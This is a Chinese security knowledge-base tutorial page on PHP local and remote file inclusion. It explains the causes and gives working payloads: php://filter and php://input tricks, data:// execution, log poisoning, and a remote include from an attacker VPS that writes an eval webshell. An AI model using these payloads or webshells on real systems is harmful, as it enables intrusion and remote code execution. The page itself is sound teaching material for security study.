<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>文件包含漏洞 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/74.3612ba47.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>工具手册</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>Web安全</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/web/" aria-current="page" title="分类简介" class="sidebar-link">分类简介</a></li><li><a href="/knowledge/web/unauthorized.html" title="未授权访问总结" class="sidebar-link">未授权访问总结</a></li><li><a href="/knowledge/web/infoleak.html" title="信息泄露漏洞" class="sidebar-link">信息泄露漏洞</a></li><li><a href="/knowledge/web/fileuploads.html" title="文件上传漏洞" class="sidebar-link">文件上传漏洞</a></li><li><a href="/knowledge/web/fileincludes.html" aria-current="page" title="文件包含漏洞" class="active sidebar-link">文件包含漏洞</a></li><li><a href="/knowledge/web/cmd_injection.html" title="命令注入漏洞" class="sidebar-link">命令注入漏洞</a></li><li><a href="/knowledge/web/logical.html" title="常见逻辑漏洞" class="sidebar-link">常见逻辑漏洞</a></li><li><a href="/knowledge/web/csrf-ssrf.html" title="请求伪造漏洞" class="sidebar-link">请求伪造漏洞</a></li><li><a href="/knowledge/web/same-origin-policy.html" title="同源策略和域安全" class="sidebar-link">同源策略和域安全</a></li><li><a href="/knowledge/web/xss.html" title="XSS 跨站脚本漏洞" class="sidebar-link">XSS 跨站脚本漏洞</a></li><li><a href="/knowledge/web/xxe.html" title="XML实体注入漏洞" class="sidebar-link">XML实体注入漏洞</a></li><li><a href="/knowledge/web/sql_injection.html" title="SQL注入漏洞" class="sidebar-link">SQL注入漏洞</a></li><li><a href="/knowledge/web/mysql-write-shell.html" title="MySQL写shell" class="sidebar-link">MySQL写shell</a></li><li><a href="/knowledge/web/websocket-sec.html" title="WebSocket安全问题分析" class="sidebar-link">WebSocket安全问题分析</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>攻防对抗</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h2 id="本地文件包含-lfi">本地文件包含(LFI) <a href="#本地文件包含-lfi" class="header-anchor">#</a></h2> <p>文件包含漏洞的产生原因是 PHP 语言在通过引入文件时，引用的文件名，用户可控，由于传入的文件名没有经过合理的校验，或者校验被绕过，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。</p> <p>当被包含的文件在服务器本地时，就形成的本地文件包含漏洞。</p> <h3 id="漏洞利用">漏洞利用 <a href="#漏洞利用" class="header-anchor">#</a></h3> <p><strong>利用条件：</strong></p> <blockquote><p>（1）include()等函数通过动态变量的方式引入包含文件；
（2）用户能够控制该动态变量。</p></blockquote> <p><strong>1、读取敏感文件</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>?arg<span class="token operator">=</span>/etc/passwd
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>2、利用封装协议读源码</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>?arg<span class="token operator">=</span>php://filter/read<span class="token operator">=</span>convert.base64-encode/resource<span class="token operator">=</span>config.php	<span class="token comment">#这样能看到php文件的源码</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>3、包含图片Getshell</strong></p> <p>在上传的图片中写入恶意代码，然后用 LFI 包含调用，就会执行图片里的PHP代码</p> <p><strong>4、截断包含</strong></p> <p>漏洞代码：</p> <div class="language-php line-numbers-mode"><pre class="language-php"><code><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
<span class="token keyword">if</span><span class="token punctuation">(</span><span class="token keyword">isset</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'arg'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token punctuation">{</span>
    <span class="token keyword">include</span><span class="token punctuation">(</span><span class="token variable">$_GET</span><span class="token punctuation">[</span><span class="token single-quoted-string string">'arg'</span><span class="token punctuation">]</span><span class="token punctuation">.</span><span class="token double-quoted-string string">&quot;.php&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span> 
<span class="token punctuation">}</span><span class="token keyword">else</span><span class="token punctuation">{</span>
    <span class="token keyword">include</span><span class="token punctuation">(</span>index<span class="token punctuation">.</span>php<span class="token punctuation">)</span><span class="token punctuation">;</span>
 <span class="token punctuation">}</span>
<span class="token delimiter important">?&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p>这样做一定程度上修复了漏洞， 上传<strong>图片一句话</strong>并访问：<code>http://vuln.com/index.php?arg=1.jpg</code>会出错。</p> <p>因为包含文件里面不存在<code>1.jpg.php</code>这个文件。</p> <p>但是如果输入<code>http://vuln.com/index.php?arg=1.jpg%00</code>，就极有可能会绕过检测。</p> <p>这种方法只适用于<code>php.ini</code>中<code>magic_quotes_qpc=off</code>并且<code>PHP</code>版本&lt; 5.3.4的情况。</p> <p>如果为on，%00会被转义，以至于无法截断。</p> <p><strong>5、包含Apache日志Getshell</strong></p> <blockquote><p>**条件：**知道日志文件access.log的存放位置 ，默认位置：<code>/var/log/httpd/access_log</code></p></blockquote> <p><code>access.log</code>文件记录了客户端每次请求的相关信息；
当我们访问一个不存在的资源时<code>access.log</code>文件仍然会记录这条资源信息。</p> <p>如果目标网站存在文件包含漏洞，但是没有可以包含的文件时，</p> <p>我们就可以尝试访问<code>http://www.vuln.com/&lt;?php phpinfo(); ?&gt;</code></p> <p>Apache会将这条信息记录在access.log文件中，这时如果我们访问access.log文件，就会触发文件包含漏洞。</p> <p>理论上是这样的，但是实际上却是输入的代码被转义无法解析。</p> <p>攻击者可以通过burpsuite进行抓包在http请求包里面将转义的代码改为正常的测试代码就可以绕过。</p> <p>这时再查看Apache日志文件，显示的就是正常的测试代码。</p> <p>这时访问：<code>http://www.vuln.com/index.php?arg=/var/log/httpd/access_log</code>，即可成功执行代码</p> <h3 id="php中的封装协议-伪协议">PHP中的封装协议(伪协议) <a href="#php中的封装协议-伪协议" class="header-anchor">#</a></h3> <p>以下协议未写明条件的即是allow_url_fopen和allow_url_include状态off/on都行。</p> <h4 id="file">file:// <a href="#file" class="header-anchor">#</a></h4> <p><strong>作用：</strong></p> <p>用于访问本地文件系统，在CTF中通常用来读取本地文件,且不受allow_url_fopen与allow_url_include的影响。</p> <p><code>include()/require()/include_once()/require_once()</code>参数可控的情况下</p> <p>如导入为非.php文件，则仍按照php语法进行解析，这是include()函数所决定的</p> <p><strong>示例：</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#1. file://[文件的绝对路径和文件名]</span>
http://127.0.0.1/include.php?file<span class="token operator">=</span>file://C:<span class="token punctuation">\</span>phpStudy<span class="token punctuation">\</span>PHPTutorial<span class="token punctuation">\</span>WWW<span class="token punctuation">\</span>phpinfo.txt

<span class="token comment">#2. file://[文件的相对路径和文件名]</span>
http://127.0.0.1/include.php?file<span class="token operator">=</span>./phpinfo.txt

<span class="token comment">#3. file://[网络路径和文件名]</span>
http://127.0.0.1/include.php?file<span class="token operator">=</span>http://127.0.0.1/phpinfo.txt
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><h4 id="php">php:// <a href="#php" class="header-anchor">#</a></h4> <p><strong>条件：</strong></p> <div class="language- line-numbers-mode"><pre class="language-text"><code>allow_url_fopen:off/on

allow_url_include : 部分需要on (下面列出)

php://input

php://stdin

php://memory 

php://temp
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br></div></div><p><strong>作用：</strong></p> <p>php:// 访问各个输入/输出流（I/O streams），在CTF中经常使用的是 <code>php://filter</code> 和 <code>php://input</code></p> <p>php://filter用于<strong>读取源码</strong>，php://input用于<strong>执行</strong>php代码</p> <p><strong>示例：</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#1. php://filter/read=convert.base64-encode/resource=[文件名]  //读取文件源码</span>
http://127.0.0.1/include.php?file<span class="token operator">=</span>php://filter/read<span class="token operator">=</span>convert.base64-encode/resource<span class="token operator">=</span>phpinfo.php

<span class="token comment">#2.php://input + [POST DATA]执行php代码</span>
http://127.0.0.1/include.php?file<span class="token operator">=</span>php://input
<span class="token punctuation">[</span>POST DATA部分<span class="token punctuation">]</span> <span class="token operator">&lt;</span>?php phpinfo<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span> ?<span class="token operator">&gt;</span>

<span class="token comment">#3.若有写入权限，[POST DATA部分] 写入一句话木马</span>
<span class="token operator">&lt;</span>?php fputs<span class="token punctuation">(</span>fopen<span class="token punctuation">(</span><span class="token string">'shell.php'</span>,<span class="token string">'w'</span><span class="token punctuation">)</span>,<span class="token string">'&lt;?php @eval(<span class="token variable">$_GET</span>[cmd]); ?&gt;'</span><span class="token punctuation">)</span><span class="token punctuation">;</span> ?<span class="token operator">&gt;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br></div></div><h4 id="zip-bzip2-zlib">zip:// &amp; bzip2:// &amp; zlib:// <a href="#zip-bzip2-zlib" class="header-anchor">#</a></h4> <p><strong>作用：</strong></p> <p><code>zip:// &amp; bzip2:// &amp; zlib://</code> 均属于压缩流，可以访问压缩文件中的子文件</p> <p>更重要的是不需要指定后缀名，可修改为任意后缀：<code>jpg png gif xxx</code> 等等</p> <p><strong>示例：</strong></p> <div class="language-html line-numbers-mode"><pre class="language-html"><code>1.zip://[压缩文件绝对路径]%23[压缩文件内的子文件名]（#编码为%23）
<span class="token comment">&lt;!--压缩 phpinfo.txt 为 phpinfo.zip ，压缩包重命名为 phpinfo.jpg ，并上传--&gt;</span>
http://127.0.0.1/include.php?file=zip://C:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt

2.compress.bzip2://file.bz2
<span class="token comment">&lt;!--压缩 phpinfo.txt 为 phpinfo.bz2 并上传（同样支持任意后缀名）--&gt;</span>
http://127.0.0.1/include.php?file=compress.bzip2://C:\phpStudy\PHPTutorial\WWW\phpinfo.bz2

3.compress.zlib://file.gz 
<span class="token comment">&lt;!--压缩 phpinfo.txt 为 phpinfo.gz--&gt;</span>
http://127.0.0.1/include.php?file=compress.zlib://C:\phpStudy\PHPTutorial\WWW\phpinfo.gz
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br></div></div><h4 id="data">data:// <a href="#data" class="header-anchor">#</a></h4> <p><strong>条件：</strong></p> <p>allow_url_fopen:on</p> <p>allow_url_include :on</p> <p><strong>作用：</strong></p> <p>自<code>PHP&gt;=5.2.0</code>起，可以使用 <code>data://</code> 数据流封装器，以传递相应格式的数据。</p> <p>通常可以用来执行PHP代码</p> <p><strong>示例：</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#1.data://text/plain,</span>
http://127.0.0.1/include.php?file<span class="token operator">=</span>data://text/plain,<span class="token operator">&lt;</span>?php%20phpinfo<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>?<span class="token operator">&gt;</span>

<span class="token comment">#2.data://text/plain;base64,</span>
http://127.0.0.1/include.php?file<span class="token operator">=</span>data://text/plain<span class="token punctuation">;</span>base64,PD9waHAgcGhwaW5mbygpOz8%2b
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><h4 id="phar">phar:// <a href="#phar" class="header-anchor">#</a></h4> <p>phar://协议与zip://类似，同样可以访问zip格式压缩包内容</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>http://127.0.0.1/include.php?file<span class="token operator">=</span>phar://C:/phpStudy/PHPTutorial/WWW/phpinfo.zip/phpinfo.txt
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>利用条件 <code>PHP &gt; 5.3</code></strong></p> <p>要想使用Phar类里的方法，必须将<code>phar.readonly</code>配置项配置为0或Off</p> <p>利用 phar 协议可以拓展 php 反序列化漏洞攻击面</p> <h2 id="远程文件包含-rfl">远程文件包含(RFL) <a href="#远程文件包含-rfl" class="header-anchor">#</a></h2> <p>服务器通过 PHP 的特性（函数）去包含任意文件时，由于要包含的这个文件来源过滤不严格，</p> <p>从而可以去包含一个恶意文件，攻击者就可以远程构造一个特定的恶意文件达到攻击目的。</p> <h3 id="漏洞利用-2">漏洞利用 <a href="#漏洞利用-2" class="header-anchor">#</a></h3> <p><strong>条件：</strong><code>php.ini</code>中开启<code>allow_url_include</code>、<code>allow_url_fopen</code>选项。</p> <p><strong>1、远程包含Webshell</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>?arg<span class="token operator">=</span>http://攻击者的VPS/shell.txt
<span class="token comment">#会在网站目录生成名为 shell.php 的一句话木马</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>shell.txt内容为：</strong></p> <div class="language-php line-numbers-mode"><pre class="language-php"><code><span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
    <span class="token function">fputs</span><span class="token punctuation">(</span><span class="token function">fopen</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'./shell.php'</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'w'</span><span class="token punctuation">)</span><span class="token punctuation">,</span><span class="token single-quoted-string string">'&lt;?php @eval($_POST[123]) ?&gt;'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token delimiter important">?&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><h3 id="代码审计">代码审计 <a href="#代码审计" class="header-anchor">#</a></h3> <p><strong>文件包含用到的函数</strong></p> <div class="language-php line-numbers-mode"><pre class="language-php"><code><span class="token keyword">include</span><span class="token punctuation">(</span><span class="token punctuation">)</span>		<span class="token comment">//使用此函数，只有代码执行到此函数时才将文件包含进来，发生错误时只警告并继续执行。</span>
<span class="token function">inclue_once</span><span class="token punctuation">(</span><span class="token punctuation">)</span>	<span class="token comment">//功能和前者一样，区别在于当重复调用同一文件时，程序只调用一次。</span>

<span class="token keyword">require</span><span class="token punctuation">(</span><span class="token punctuation">)</span>		<span class="token comment">//使用此函数，只要程序执行，立即调用此函数包含文件发生错误时，会输出错误信息并立即终止程序。</span>
<span class="token keyword">require_once</span><span class="token punctuation">(</span><span class="token punctuation">)</span>	<span class="token comment">//功能和前者一样，区别在于当重复调用同一文件时，程序只调用一次。</span>
